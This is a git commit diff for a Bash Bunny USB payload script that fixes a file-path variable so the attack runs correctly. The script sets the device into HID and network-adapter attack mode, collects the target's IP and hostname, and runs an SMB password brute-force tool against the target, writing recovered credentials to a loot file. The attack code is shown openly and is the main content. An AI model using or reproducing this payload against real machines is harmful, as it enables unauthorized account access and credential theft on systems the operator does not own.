Critical fixes
I really missed the BB's original variable "$SWITCH_POSITION" since in my testing BB's payload I'm maintaining it in my code as: ORIGINAL_SWITCH="/root/udisk/payloads/$SWITCH_POSITION" Thanks to @catatonicprime for offering the fix for this issue.pull/383/head
parent
6ee12332e5
commit
3980bab638
|
@ -4,16 +4,18 @@
|
||||||
# Author: Mohamed A. Baset (@SymbianSyMoh)
|
# Author: Mohamed A. Baset (@SymbianSyMoh)
|
||||||
# PS: This is the shittiest bash script you'll ever see :D
|
# PS: This is the shittiest bash script you'll ever see :D
|
||||||
|
|
||||||
password_process_file="$ORIGINAL_SWITCH/ppf.txt"
|
|
||||||
password_loot_file="$ORIGINAL_SWITCH/credentials.txt"
|
|
||||||
user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt"
|
|
||||||
pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt"
|
|
||||||
|
|
||||||
# Setup
|
# Setup
|
||||||
LED SETUP
|
LED SETUP
|
||||||
CUCUMBER PLAID
|
CUCUMBER PLAID
|
||||||
ATTACKMODE HID RNDIS_ETHERNET
|
|
||||||
mount /dev/nandf /root/udisk/
|
mount /dev/nandf /root/udisk/
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
BBSWITCH="/root/udisk/payloads/$SWITCH_POSITION"
|
||||||
|
password_process_file="$BBSWITCH/ppf.txt"
|
||||||
|
password_loot_file="$BBSWITCH/credentials.txt"
|
||||||
|
user_bruteforce_list="$BBSWITCH/userlist.txt"
|
||||||
|
pass_bruteforce_list="$BBSWITCH/passlist.txt"
|
||||||
|
mmcbrute_path="$BBSWITCH/mmcbrute"
|
||||||
|
ATTACKMODE HID RNDIS_ETHERNET
|
||||||
GET TARGET_IP
|
GET TARGET_IP
|
||||||
GET TARGET_HOSTNAME
|
GET TARGET_HOSTNAME
|
||||||
|
|
||||||
|
@ -23,7 +25,7 @@ echo $TARGET_HOSTNAME >> $pass_bruteforce_list
|
||||||
|
|
||||||
# Perform SMB bruteforce attack
|
# Perform SMB bruteforce attack
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
|
python $mmcbrute_path/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
|
||||||
|
|
||||||
# Check for results
|
# Check for results
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
|
|
Loading…
Reference in New Issue